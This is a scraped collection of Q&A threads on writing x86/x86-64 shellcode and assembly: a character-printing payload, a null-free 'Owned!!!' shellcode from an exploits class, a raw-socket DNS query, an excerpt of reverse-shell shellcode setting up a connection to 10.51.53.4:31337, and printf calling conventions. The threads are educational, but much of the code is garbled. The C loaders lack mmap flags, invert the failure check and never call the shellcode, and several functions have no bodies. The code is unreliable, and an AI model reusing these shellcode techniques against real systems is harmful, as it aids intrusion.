Shell code print character(64bits) - shellcode

I have a problem with this shellcode.
When I run the assembled code on its own it prints the character, but when I call it as a function from C it does not.
I stepped through it with gdb and every instruction appears to be executed.
It is very weird, because I debugged both the asm and the C versions and they do the same thing, yet at the int 0x80 nothing is printed in the C version.
This is the C code:
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
0000000000000000 <main>: /
0: 48 31 c9 xor %rcx,%rcx /
3: 48 31 c0 xor %rax,%rax /
6: eb 13 jmp 1b <n> /
0000000000000008 <et>: /
8: 59 pop %rcx /
9: 48 31 c0 xor %rax,%rax /
c: 48 31 db xor %rbx,%rbx /
f: 48 31 d2 xor %rdx,%rdx /
12: b0 04 mov $0x4,%al /
14: b3 01 mov $0x1,%bl /
16: b2 01 mov $0x1,%dl /
18: cd 80 int $0x80 /
1a: c3 retq /
000000000000001b <n>: /
1b: e8 e8 ff ff ff callq 8 <et> /
0000000000000020 <abc>: /
20: 77 .byte 0x77 /
... /
char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x13\x59\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x04\xb3\x01\xb2\x01\xcd\x80\xc3\xe8\xe8\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x11\x59\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x48\x31\xc0\x48\xff\xc0\xcd\x80\xe8\xea\xff\xff\xffw";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode),
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
return 0;
This is the nasm code:
global main

; Prints the single character stored at abc.
; The jmp/call/pop sequence obtains the address of abc without any absolute
; address: `call et` pushes the address of the byte that follows it (abc),
; and `pop rcx` at et picks that address up.
; This version uses the int 0x80 system-call interface (write = 4, arguments
; in ebx/ecx/edx).
main:                           ; main
        xor     rcx, rcx        ; efficient way of setting a register to 0
        xor     rax, rax        ; (exclusive or of the register with itself)
        jmp     n               ; go to the call so that it can push abc's address
et:
        pop     rcx             ; rcx = address of abc (pushed by `call et`)
        xor     rax, rax
        xor     rbx, rbx
        xor     rdx, rdx
        mov     al, 4           ; number of the system call (write)
        mov     bl, 1           ; argument (1 = stdout)
        mov     dl, 1           ; number of characters
        int     0x80
        ret                     ; return to the caller of main
n:
        call    et              ; pushes the address of abc and continues at et
abc:    db      'w'
I have solved the problem.
On this web page I found that in 64-bit mode system calls must be made with the syscall instruction instead of int 0x80, and that the arguments are passed in different registers.
Then I found another web page with some examples of making these system calls; I think it is a good resource.
But the question now is: why did it work with the NASM code? Is it something to do with compatibility? Maybe the assembled program was running in compatibility mode because the assembler detected the int 0x80 instruction, whereas in C the compiler could not, because it cannot interpret the shellcode?
I leave here the working C code:
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
0000000000000000 <main>: /
0: 48 31 c9 xor %rcx,%rcx /
3: 48 31 c0 xor %rax,%rax /
6: eb 16 jmp 1e <n> /
0000000000000008 <et>: /
8: 5e pop %rsi /
9: 48 31 c0 xor %rax,%rax /
c: 48 31 db xor %rbx,%rbx /
f: 48 31 d2 xor %rdx,%rdx /
12: b0 01 mov $0x1,%al /
14: b3 01 mov $0x1,%bl /
16: 48 89 df mov %rbx,%rdi /
19: b2 01 mov $0x1,%dl /
1b: 0f 05 syscall /
1d: c3 retq /
000000000000001e <n>: /
1e: e8 e5 ff ff ff callq 8 <et> /
0000000000000023 <abc>: /
23: 77 .byte 0x77 /
char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x16\x5e\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x01\xb3\x01\x48\x89\xdf\xb2\x01\x0f\x05\xc3\xe8\xe5\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x13\x59\x48\x31\xc0\x48\x31\xdb\x48\x31\xd2\xb0\x04\xb3\x01\xb2\x01\xcd\x80\xc3\xe8\xe8\xff\xff\xffw";
//char shellcode[] = "\x48\x31\xc9\x48\x31\xc0\xeb\x11\x59\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x48\x31\xc0\x48\xff\xc0\xcd\x80\xe8\xea\xff\xff\xffw";
int main(int argc, char **argv) {
char *ptr = mmap(0, sizeof(shellcode),
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
return 0;

You were probably building the ELF file as a 32 bit one. Even if your OS is 64 bits, if the binary is 32 then it runs in compatibility mode.
Same thing happens on Windows (it's called "Windows-on-Windows-64" or "WOW64").


NASM Segmentation fault

I'm using a 64-bit Ubuntu 18.04.3 LTS VM and I'm trying to write a simple x64 assembly code that will print "Owned!!!".
Because I don't want any 0x00 or 0x0a bytes and I want the code to be position independent (because I'm learning how to write shellcodes), I wrote it this way:
;hello4.asm attempts to make the code position independent
;NOTE: this first version calls the kernel through the int 0x80 interface
;from 64-bit code; it is the variant that crashes in the session shown below.
section .text
global _start
_start:
    ;clear out the registers we are going to need
    xor rax, rax
    xor rbx, rbx
    xor rcx, rcx
    xor rdx, rdx
    ;write(int fd, char *msg, unsigned int len)
    mov al, 4               ;system call number 4
    mov bl, 1               ;fd 1
    ;Owned!!! = 4f,77,6e,65,64,21,21,21
    ;push !,!,!,d
    push 0x21212164
    ;push e,n,w,O
    push 0x656e774f
    mov rcx, rsp            ;rcx = address of the text just pushed
    mov dl, 8               ;length
    int 0x80
    ;exit(int ret)
    mov al,1
    xor rbx, rbx
    int 0x80
This is the output that I'm getting:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ nasm -f elf64 hello4.asm
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ld hello4.o -o hello4
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 db xor rbx,rbx
400086: 48 31 c9 xor rcx,rcx
400089: 48 31 d2 xor rdx,rdx
40008c: b0 04 mov al,0x4
40008e: b3 01 mov bl,0x1
400090: 68 64 21 21 21 push 0x21212164
400095: 68 4f 77 6e 65 push 0x656e774f
40009a: 48 89 e1 mov rcx,rsp
40009d: b2 08 mov dl,0x8
40009f: cd 80 int 0x80
4000a1: b0 01 mov al,0x1
4000a3: 48 31 db xor rbx,rbx
4000a6: cd 80 int 0x80
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ./hello4
Segmentation fault (core dumped)
How do I fix this?
I've understood that int 0x80 is intended for 32-bit programs and I should use syscall instead and that syscall has different ids for each system call.
The new code is:
;hello4.asm attempts to make the code position independent
;NOTE: this intermediate version still has a bug. In 64-bit mode each push
;stores 8 bytes, so the two halves of the text are separated by four zero
;bytes and a length of 8 only covers "Owne" plus that padding.
section .text
global _start
_start:
    ;clear out the registers we are going to need
    xor rax, rax
    xor rsi, rsi
    xor rdi, rdi
    xor rdx, rdx
    ;write(int fd, char *msg, unsigned int len)
    mov al, 1               ;system call number 1 (write with syscall)
    add di, 1               ;rdi = 1 (fd)
    ;Owned!!! = 4f,77,6e,65,64,21,21,21
    ;push !,!,!,d
    push 0x21212164
    ;push e,n,w,O
    push 0x656e774f
    mov rsi, rsp            ;rsi = address of the pushed text
    mov dl, 8               ;length
    syscall
    ;exit(int ret)
    mov al, 60              ;only al is written: relies on the upper bytes of rax being 0
    xor rdi, rdi            ;exit status 0
    syscall
The output is Owne% instead of Owned!!! now.
It still needs to be fixed.
With the help of #CertainLach I've written the correct code:
;hello4.asm attempts to make the code position independent
;Writes "Owned!!!" to fd 1 and exits with status 0 using the 64-bit syscall
;interface (rax = number, rdi/rsi/rdx = arguments).
section .text
global _start
_start:
    ;clear out the registers we are going to need
    xor rax, rax
    xor rsi, rsi
    xor rdi, rdi
    xor rdx, rdx
    ;write(int fd, char *msg, unsigned int len)
    mov al, 1               ;system call number 1 (write)
    add di, 1               ;rdi = 1 (fd)
    ;Owned!!! = 4f,77,6e,65,64,21,21,21
    ;load all 8 characters into one register so a single push stores them
    ;contiguously on the stack
    mov rsi, 0x21212164656e774f
    push rsi
    mov rsi, rsp            ;rsi = address of the text
    mov dl, 8               ;length
    syscall
    ;exit(int ret)
    mov al, 60              ;only al is written: relies on the upper bytes of rax being 0
    xor rdi, rdi            ;exit status 0
    syscall
This code contains no null bytes or 0x0a bytes and it's position-independent, as following:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 48 be 4f 77 6e 65 64 movabs rsi,0x21212164656e774f
400099: 21 21 21
40009c: 56 push rsi
40009d: 48 89 e6 mov rsi,rsp
4000a0: b2 08 mov dl,0x8
4000a2: 0f 05 syscall
4000a4: b0 3c mov al,0x3c
4000a6: 48 31 ff xor rdi,rdi
4000a9: 0f 05 syscall
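This variant also works. Its machine code is one byte shorter, but it uses more stack memory: each push stores 8 bytes, so 16 bytes are written (each 4-character half of the text followed by four zero bytes) instead of 8: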
user#PC:~/Desktop/exploitsclass/hello_shellcode$ cat hello4.asm
;hello4.asm attempts to make the code position independent
;Variant that keeps the two 32-bit pushes. Each push stores 8 bytes in 64-bit
;mode, so the length passed to write is 16 to cover both halves of the text
;(including the zero bytes that pad each half).
section .text
global _start
_start:
    ;clear out the registers we are going to need
    xor rax, rax
    xor rsi, rsi
    xor rdi, rdi
    xor rdx, rdx
    ;write(int fd, char *msg, unsigned int len)
    mov al, 1               ;system call number 1 (write)
    add di, 1               ;rdi = 1 (fd)
    ;Owned!!! = 4f,77,6e,65,64,21,21,21
    ;push !,!,!,d
    push 0x21212164
    ;push e,n,w,O
    push 0x656e774f
    mov rsi, rsp            ;rsi = address of the pushed text
    mov dl, 16              ;length: two 8-byte stack slots
    syscall
    ;exit(int ret)
    mov al, 60              ;only al is written: relies on the upper bytes of rax being 0
    xor rdi, rdi            ;exit status 0
    syscall
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 68 64 21 21 21 push 0x21212164
400097: 68 4f 77 6e 65 push 0x656e774f
40009c: 48 89 e6 mov rsi,rsp
40009f: b2 10 mov dl,0x10
4000a1: 0f 05 syscall
4000a3: b0 3c mov al,0x3c
4000a5: 48 31 ff xor rdi,rdi
4000a8: 0f 05 syscall
Thank you so much!
I can't reply to your comment directly, so I'll answer here: you can't just replace int 0x80 with syscall and expect it to work, because the system call numbers differ. For example, the sys_write you use here has number 4 with int 0x80 and number 1 with syscall.
Here you can see numbers for syscall
And here for int 0x80

Saving DNS response in assembly using syscalls

I want to learn more about DNS, and I want to use assembly to do it.
I noticed in tcpdump that my request appears to be accurate and that I receive a response back, but my code does not yet handle that response.
I looked on a few sites and it looks like recvfrom should be used, but I don't understand how I would call that function. Another answer I have seen is to use dup2, which from what I understand redirects stdin, stdout and stderr. From what I have been reading, I should use socketcall (0x66) to call recvfrom and get the data that has been sent to me. Most of the examples use TCP and don't quite fit here, since I am using UDP for DNS.
Here is my code, which queries Google's DNS server (8.8.8.8) for example.com:
; Create the socket with syscall 0x66 (socketcall) and sub-call SYS_SOCKET, so ebx = 1.
; The three pushes below form the argument array {0x2, 0x2, 0}.
push 0x66
pop eax
push 0x1
pop ebx
xor ecx,ecx
push ecx ; third argument = 0
; this time it is a SOCK_DGRAM (UDP) socket, so 0x2 as the type argument
push 0x2
push 0x2
mov ecx,esp ; ecx -> argument array on the stack
int 0x80
; eax now holds the socket fd; it is copied into esi a few lines below.
; Build the destination address on the stack: 8.8.8.8, port 53, family 2.
push 0x08080808 ; 8.8.8.8 - all four bytes are equal, so byte order does not matter here
;push 0x0100007F ; 0100007F for testing...
xor edx,edx
mov dh, 0x35 ; dx = 0x3500, stored as bytes 00 35 = port 53; comment this for variable port
push dx ; comment this for variable port
; push word PORT ; UNcomment this for variable port
push word 0x2 ; address family 2
mov ecx,esp ; save pointer to the address structure in ecx
push 0x10 ; addrlen
push ecx ; pointer to sockaddr
push eax ; fd received previously
mov ecx,esp ; ecx -> {fd, sockaddr pointer, addrlen}
mov esi,eax ; save fd for next call
xor eax,eax
mov al,0x66 ; socketcall again
add bl,0x2 ; bl goes from 1 to 3 (SYS_CONNECT)
int 0x80
; now we send a UDP packet to open stateful firewall :]
xor eax,eax
mov al,0x66 ; socketcall; ssize_t send(int sockfd, const void *buf, size_t len, int flags);
; The DNS query is pushed last dword first, so it reads in order starting at esp.
push 0x00000001 ; bytes 01 00 00 00: low byte of QCLASS, then three padding bytes
push 0x00010000 ; bytes 00 00 01 00: end of QNAME, QTYPE = 1, high byte of QCLASS
push 0x6d6f6303 ; bytes 03 'c' 'o' 'm'
push 0x656c706d ; bytes 'm' 'p' 'l' 'e'
push 0x61786507 ; bytes 07 'e' 'x' 'a'
push 0x00000000 ; authority count = 0, additional count = 0
push 0x00000100 ; question count = 1, answer count = 0
push 0x0001AAAA ; ID = AA AA, query parameters = 01 00
mov edx,esp ; Move the address of the message to EDX so we can send it.
xor ecx,ecx
push ecx ; flags = 0
push 64 ; len = 64 - NOTE(review): only 32 bytes were pushed above (the query itself is 29 bytes), so this looks too large
push edx ; buf
push esi ; sockfd
mov ecx,esp ; ecx -> {sockfd, buf, len, flags}
xor ebx,ebx
mov bl,0x9 ; SYS_SEND
int 0x80
mov ebx,esi ; ebx = socket fd
xor ecx,ecx
mov cl,0x2 ; ecx = 2, counted down to 0 by the loop
loop: ;Not sure if this is needed at all
; syscall dup2
mov al,0x3f ; only al is written, so the upper bytes of eax must already be zero
int 0x80
dec ecx
jns loop ; runs for ecx = 2, 1, 0
xor esi,esi
push esi ; push a zero dword
mov edx,esp ; edx -> that zero
push ebx ; push the socket fd
mov ecx,esp ; ecx -> {fd, 0}
int 0x80 ; NOTE(review): eax is not loaded with a system-call number before this int 0x80 - confirm which call was intended
Here is how it's done .
;Author : Krash
section .text
global main ;must be declared for linker (ld)
; SOCKETCALL PARAMS You can pass a value to EBX to utilize one of these functions.
; #define SYS_SOCKET 1 /* sys_socket(2) */
; #define SYS_BIND 2 /* sys_bind(2) */
; #define SYS_CONNECT 3 /* sys_connect(2) */
; #define SYS_LISTEN 4 /* sys_listen(2) */
; #define SYS_ACCEPT 5 /* sys_accept(2) */
; #define SYS_GETSOCKNAME 6 /* sys_getsockname(2) */
; #define SYS_GETPEERNAME 7 /* sys_getpeername(2) */
; #define SYS_SOCKETPAIR 8 /* sys_socketpair(2) */
; #define SYS_SEND 9 /* sys_send(2) */
; #define SYS_RECV 10 /* sys_recv(2) */
; #define SYS_SENDTO 11 /* sys_sendto(2) */
; #define SYS_RECVFROM 12 /* sys_recvfrom(2) */
; #define SYS_SHUTDOWN 13 /* sys_shutdown(2) */
; #define SYS_SETSOCKOPT 14 /* sys_setsockopt(2) */
; #define SYS_GETSOCKOPT 15 /* sys_getsockopt(2) */
; #define SYS_SENDMSG 16 /* sys_sendmsg(2) */
; #define SYS_RECVMSG 17 /* sys_recvmsg(2) */
; #define SYS_ACCEPT4 18 /* sys_accept4(2) */
; #define SYS_RECVMMSG 19 /* sys_recvmmsg(2) */
; #define SYS_SENDMMSG 20 /* sys_sendmmsg(2) */
;The Message We want to send.
; AA AA - ID
; 01 00 - Query parameters
; 00 01 - Number of questions
; 00 00 - Number of answers
; 00 00 - Number of authority records
; 00 00 - Number of additional records
; 07 - 'example' has length 7, ;so change this to be the length of domain ; keep in mind there are not '.' in the question.
; 65 - e
; 78 - x
; 61 - a
; 6D - m
; 70 - p
; 6C - l
; 65 - e
; 03 - subdomain '.com' length 03 ; change this to be the length of type.
; 63 - c
; 6F - o
; 6D - m
; 00 - zero byte to end the QNAME
; 00 01 - QTYPE
; 00 01 - QCLASS
; DNS ANSWER! This is What We Want to receive ;
; aa aa
; 81 80
; 00 01
; 00 01
; 00 00
; 00 00
; 07 65
; 78 61
; 6d 70
; 6c 65
; 03 63
; 6f 6d
; 00 00
; 01 00
; 01 c0
; 0c 00
; 01 00
; 01 00
; 00 12
; 8d 00
; 04
; 5d
; b8
; d8
; 22
; Create the socket with syscall 0x66 (socketcall) and sub-call SYS_SOCKET, so ebx = 1.
; The three pushes below form the argument array {0x2, 0x2, 0}.
push 0x66
pop eax
push 0x1
pop ebx
xor ecx,ecx
push ecx ; third argument = 0
; this time it is a SOCK_DGRAM (UDP) socket, so 0x2 as the type argument
push 0x2
push 0x2
mov ecx,esp ; ecx -> argument array on the stack
int 0x80 ; SYS_SOCKET
; saving fd on the stack ; In reality I think I will save the port here instead
push eax
; Build the destination address on the stack: 8.8.8.8, port 53, family 2.
push 0x08080808 ; 8.8.8.8 - all four bytes are equal, so byte order does not matter here
;push 0x0100007F ; 0100007F for testing...
xor edx,edx
mov dh, 0x35 ; dx = 0x3500, stored as bytes 00 35 = port 53; comment this for variable port
push dx ; comment this for variable port
; push word PORT ; UNcomment this for variable port
push word 0x2 ; address family 2
mov ecx,esp ; save pointer to the address structure in ecx
push 0x10 ; addrlen
push ecx ; pointer to sockaddr
push eax ; fd received previously
mov ecx,esp ; ecx -> {fd, sockaddr pointer, addrlen}
mov esi,eax ; save fd for next call
xor eax,eax
mov al,0x66
add bl,0x2 ; BL = 3 SYS_CONNECT
; NOTE(review): no int 0x80 follows here, so the connect prepared above is never issued - confirm whether a line is missing
; now we send a UDP packet to open stateful firewall :]
xor eax,eax
mov al,0x66 ; socketcall
; The DNS query is pushed last dword first, so it reads in order starting at esp.
push 0x00000001 ; Original working request to Google DNS; bytes 01 00 00 00: low byte of QCLASS, then padding
push 0x00010000 ; bytes 00 00 01 00: end of QNAME, QTYPE = 1, high byte of QCLASS
push 0x6d6f6303 ; bytes 03 'c' 'o' 'm'
push 0x656c706d ; bytes 'm' 'p' 'l' 'e'
push 0x61786507 ; bytes 07 'e' 'x' 'a'
push 0x00000000 ; authority count = 0, additional count = 0
push 0x00000100 ; question count = 1, answer count = 0
push 0x0001AAAA ; This and the two pushes above form the DNS header, written as little-endian dwords.
mov edx,esp ; Move the address of the message to EDX so we can send it.
xor ecx,ecx
push ecx ; flags = 0
push 64 ; len = 64 - NOTE(review): only 32 bytes were pushed above (the query itself is 29 bytes), so this looks too large
push edx ; buf
push esi ; sockfd
mov ecx,esp ; ecx -> {sockfd, buf, len, flags}
xor ebx,ebx
mov bl,0x9 ; SYS_SEND
int 0x80 ;CALL SYS_SEND
mov eax, 3 ; Prepare for SYSCALL_READ
mov ebx, 3 ; fd hard-coded to 3 - assumes the socket got descriptor 3 (the real fd is in esi); TODO confirm
mov ecx, esp ; buffer = current top of stack
mov edx, 100 ; read at most 100 bytes
; NOTE(review): no int 0x80 follows here, so eax is still 3 in the arithmetic below - confirm whether a line is missing
add esp, eax ; presumably meant to advance esp by the number of bytes read
sub esp, 4 ; step back 4 bytes, i.e. to the last dword of that range
mov eax ,[esp] ; load that dword (presumably the IP address that ends the answer)
push eax ; Probably not needed, I just want to ensure it's saved on the stack for further use..

x86 64 Reverse shell shellcode

I am looking a reverse shell shellcode from this link. I am not able to follow the reason for the following instructions in the shellcode:
4000a3: 4d 31 d2 xor r10,r10
4000a6: 41 52 push r10
4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a
4000ba: 04
4000bb: 48 89 e6 mov rsi,rsp
I searched other SO questions, and I find that BYTE/WORD/DWORD PTR would be used to assign a byte/word/dword. Since this x86 64, I'm assuming WORD here means 2 bytes and DWORD means 4 bytes (please correct me if I'm wrong).
The author is pushing zero on the stack. Then he has 3 mov instructions.
Assume RSP initially points to:
x00 x00 x00 x00 x00 x00 x00 x00
1) Is the following the effect of the three mov instructions (assuming little endian) ?
x04 x35 x33 x0a x7a x69 x00 x02
2) If yes, then what is the author achieving by it because isn't the next mov instructions overwriting what's pointed by rsp ?
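1) Yes, apart from the order of the two port bytes: listed from the highest address down to [rsp], the bytes are x04 x35 x33 x0a x69 x7a x00 x02 (little endian puts 0x7a at [rsp+2] and 0x69 at [rsp+3]).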
2) Author is saving the sockaddr for the socket connect syscall
int connect(int sockfd, const struct sockaddr *addr,
socklen_t addrlen);
In x86-64 the arguments are passed in the registers rdi, rsi and rdx, so he moves the addr pointer into the rsi register (mov rsi,rsp).
mov BYTE PTR [rsp],0x2 ; address family 2 (PF_INET)
mov WORD PTR [rsp+0x2],0x697a ; port = 31337: stored as bytes 7a 69, which is 0x7a69 in network byte order
mov DWORD PTR [rsp+0x4],0x435330a ; addr = 10.51.53.4 (bytes 0a 33 35 04)

Assembly - Passing parameters to a function call

I am currently practicing reading assembly by disassembling C programs and trying to understand what they do.
I am stuck on a trivial one: a simple hello world program.
#include <stdio.h>
#include <stdlib.h>
/* Prints the greeting (without a trailing newline) and returns 0. */
int main() {
    printf("Hello, world!");
    return 0;
}
When I disassemble the main:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400526 <+0>: push rbp
0x0000000000400527 <+1>: mov rbp,rsp
0x000000000040052a <+4>: mov edi,0x4005c4
0x000000000040052f <+9>: mov eax,0x0
0x0000000000400534 <+14>: call 0x400400 <printf#plt>
0x0000000000400539 <+19>: mov eax,0x0
0x000000000040053e <+24>: pop rbp
0x000000000040053f <+25>: ret
I understand the first two lines: the base pointer is saved on the stack (by push rbp, which causes the value of the stack pointer to be decreased by 8, because it has "grown") and the value of the stack pointer is saved in the base pointer (so that parameters and local variable can be easily reached through positive and negative offsets, respectively, while the stack can keep "growing").
The third line presents the first issue: why is 0x4005c4 (the address of the "Hello, World!" string) moved in the edi register instead of moving it on the stack? Shouldn't the printf function take the address of that string as parameter? For what I know, functions take parameters from the stack (but here, it looks like the parameter is put in that register: edi)
In another post here on Stack Overflow I read that "printf@plt" is like a stub function that calls the real printf function. I tried to disassemble that function, but it gets even more confusing:
(gdb) disassemble printf
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8
0x00007ffff7a637b7 <+7>: test al,al
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91>
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0]
0x00007ffff7a63813 <+99>: mov rsi,rdi
0x00007ffff7a63816 <+102>: lea rdx,[rsp+0x8]
0x00007ffff7a6381b <+107>: mov QWORD PTR [rsp+0x10],rax
0x00007ffff7a63820 <+112>: lea rax,[rsp+0x20]
0x00007ffff7a63825 <+117>: mov DWORD PTR [rsp+0x8],0x8
0x00007ffff7a6382d <+125>: mov DWORD PTR [rsp+0xc],0x30
0x00007ffff7a63835 <+133>: mov QWORD PTR [rsp+0x18],rax
0x00007ffff7a6383a <+138>: mov rax,QWORD PTR [rip+0x36d70f] # 0x7ffff7dd0f50
0x00007ffff7a63841 <+145>: mov rdi,QWORD PTR [rax]
0x00007ffff7a63844 <+148>: call 0x7ffff7a5b130 <_IO_vfprintf_internal>
0x00007ffff7a63849 <+153>: add rsp,0xd8
0x00007ffff7a63850 <+160>: ret
End of assembler dump.
The two mov operations on eax (mov eax, 0x0) bother me a little as well, since I don't understand their role here (but I am more concerned with what I have just described).
Thank you in advance.
gcc is targeting the x86-64 System V ABI, used by all x86-64 systems other than Windows (for various historical reasons). Its calling convention passes the first few args in registers before falling back to the stack. (See also the Wikipedia basic summary of this calling convention.)
And yes, this is different from the crusty old 32-bit calling conventions that use the stack for everything. This is a Good Thing. See also the x86 tag wiki for more links to ABI docs, and tons of other stuff.
0x0000000000400526: push rbp
0x0000000000400527: mov rbp,rsp # stack-frame boilerplate
0x000000000040052a: mov edi,0x4005c4 # first arg
0x000000000040052f: mov eax,0x0 # 0 FP args in vector registers
0x0000000000400534: call 0x400400 <printf#plt>
0x0000000000400539: mov eax,0x0 # return 0. If you'd compiled with optimization, this and the previous mov would be xor eax,eax
0x000000000040053e: pop rbp # clean up stack frame
0x000000000040053f: ret
Pointers to static data fit into 32 bits, which is why it can use mov edi, imm32 instead of movabs rdi, imm64.
Floating-point args are passed in SSE registers (xmm0-xmm7), even to var-args functions. al indicates how many FP args are in vector registers. (Note that C's type promotion rules mean that float args to variadic functions are always promoted to double, which is why printf doesn't have any format specifiers for float, only double and long double).
"printf@plt is like a stub function that calls the real printf function."
Yes, that's right. The Procedure Linking Table entry starts out as a jmp to a dynamic linker routine that resolves the symbol and modifies the code in the PLT to turn it into a jmp directly to the address where libc's printf definition is mapped. printf is a weak alias for __printf, which is why gdb chooses the __printf label for that address, after you asked for disassembly of printf.
Dump of assembler code for function __printf:
0x00007ffff7a637b0 <+0>: sub rsp,0xd8 # reserve space
0x00007ffff7a637b7 <+7>: test al,al # check if there were any FP args
0x00007ffff7a637b9 <+9>: mov QWORD PTR [rsp+0x28],rsi # store the integer arg-passing registers to local scratch space
0x00007ffff7a637be <+14>: mov QWORD PTR [rsp+0x30],rdx
0x00007ffff7a637c3 <+19>: mov QWORD PTR [rsp+0x38],rcx
0x00007ffff7a637c8 <+24>: mov QWORD PTR [rsp+0x40],r8
0x00007ffff7a637cd <+29>: mov QWORD PTR [rsp+0x48],r9
0x00007ffff7a637d2 <+34>: je 0x7ffff7a6380b <__printf+91> # skip storing the FP arg-passing regs if there were no FP args
0x00007ffff7a637d4 <+36>: movaps XMMWORD PTR [rsp+0x50],xmm0
0x00007ffff7a637d9 <+41>: movaps XMMWORD PTR [rsp+0x60],xmm1
0x00007ffff7a637de <+46>: movaps XMMWORD PTR [rsp+0x70],xmm2
0x00007ffff7a637e3 <+51>: movaps XMMWORD PTR [rsp+0x80],xmm3
0x00007ffff7a637eb <+59>: movaps XMMWORD PTR [rsp+0x90],xmm4
0x00007ffff7a637f3 <+67>: movaps XMMWORD PTR [rsp+0xa0],xmm5
0x00007ffff7a637fb <+75>: movaps XMMWORD PTR [rsp+0xb0],xmm6
0x00007ffff7a63803 <+83>: movaps XMMWORD PTR [rsp+0xc0],xmm7
0x00007ffff7a6380b <+91>: lea rax,[rsp+0xe0] # some more stuff
So printf's implementation keeps the var-args handling simple by storing all the arg-passing registers (except the first one holding the format string) in order to local arrays. It can walk a pointer through them instead of needing switch-like code to extract the right integer or FP arg. It still needs to keep track of the first 5 integer and first 8 FP args, because they aren't contiguous with the rest of the args pushed by the caller onto the stack.
The Windows 64-bit calling convention's shadow space simplifies this by providing space for a function to dump its register args to the stack contiguous with the args already on the stack, but that's not worth wasting 32 bytes of stack on every call, IMO. (See my answer and comments on other answers on Why does Windows64 use a different calling convention from all other OSes on x86-64?)
There is nothing trivial about printf; it is not the first choice for what you are trying to do, but it turned out not to be overly complicated.
Something simpler:
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: e8 00 00 00 00 callq 9 <fun+0x9>
9: 48 83 c4 08 add $0x8,%rsp
d: 83 c0 07 add $0x7,%eax
10: c3 retq
and the stack is used. eax used for the return.
now use a pointer
extern unsigned int more_fun ( unsigned int * );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
d: e8 00 00 00 00 callq 12 <fun+0x12>
12: 48 83 c4 18 add $0x18,%rsp
16: 83 c0 07 add $0x7,%eax
19: c3 retq
and there you go edi used as in your case.
two pointers
extern unsigned int more_fun ( unsigned int *, unsigned int * );
unsigned int fun ( unsigned int x, unsigned int y )
0000000000000000 <fun>:
0: 48 83 ec 18 sub $0x18,%rsp
4: 89 7c 24 0c mov %edi,0xc(%rsp)
8: 89 74 24 08 mov %esi,0x8(%rsp)
c: 48 8d 7c 24 0c lea 0xc(%rsp),%rdi
11: 48 8d 74 24 08 lea 0x8(%rsp),%rsi
16: e8 00 00 00 00 callq 1b <fun+0x1b>
1b: 48 83 c4 18 add $0x18,%rsp
